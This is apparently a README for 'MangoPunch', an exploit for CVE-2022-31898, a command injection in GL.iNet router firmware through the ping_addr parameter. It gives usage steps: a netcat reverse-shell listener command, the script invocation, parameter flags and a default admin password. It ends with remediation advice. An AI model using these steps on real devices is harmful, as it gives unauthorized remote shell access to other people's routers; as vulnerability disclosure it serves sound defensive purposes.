Share
## https://sploitus.com/exploit?id=63A2EA58-3B55-5F4A-815C-DDFA5F92EF04
# ๐ฅญ MangoPunch: CVE-2022-31898
### Authenticated OS Command Injection for GL.iNet Devices



```text
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
```
---
## ๐ Vulnerability Overview
This repository contains a technical Proof of Concept (PoC) for a **Remote Command Execution (RCE)** vulnerability found in the GL.iNet MT300N-V2 (Mango) and other models running firmware versions below **3.215**.
The flaw exists in the `ping_addr` parameter of the diagnostic API, allowing an authenticated attacker to execute arbitrary system commands via shell metacharacters (`;`).
---
## ๐ Execution Guide
### 1. Prepare your Listener
Open a terminal in your attacker machine (Kali Linux) and start a Netcat listener:
```bash
nc -lvnp 9292
```
### 2. Run the Exploit
Use the following command to trigger the reverse shell:
```bash
python3 mangopunch.py -R -L -l -p
```
---
## ๐ ๏ธ Script Parameters
| Flag | Full Name | Description | Default |
| :--- | :--- | :--- | :--- |
| `-R` | `--rhost` | Remote Target IP (Router) | `Required` |
| `-P` | `--rport` | Web Management Port | `443` |
| `-L` | `--lhost` | Listener IP (Kali/Attacker) | `Required` |
| `-l` | `--lport` | Listener Port | `Required` |
| `-p` | `--pwd` | Admin Password | `goodlife` |
| `-t` | `--https` | Enable HTTPS | `False` |
---
## ๐ก๏ธ Remediation
* **Update Firmware**: Ensure your device is running version **3.215** or higher.
* **Input Validation**: Developers should implement strict Regex validation for IP/Hostname parameters and avoid shell-invoking functions that pass raw strings to the OS.
---
> **Disclaimer**: This tool is for educational and authorized security testing purposes only. The author is not responsible for any misuse. MangoPunch: CVE-2022-31898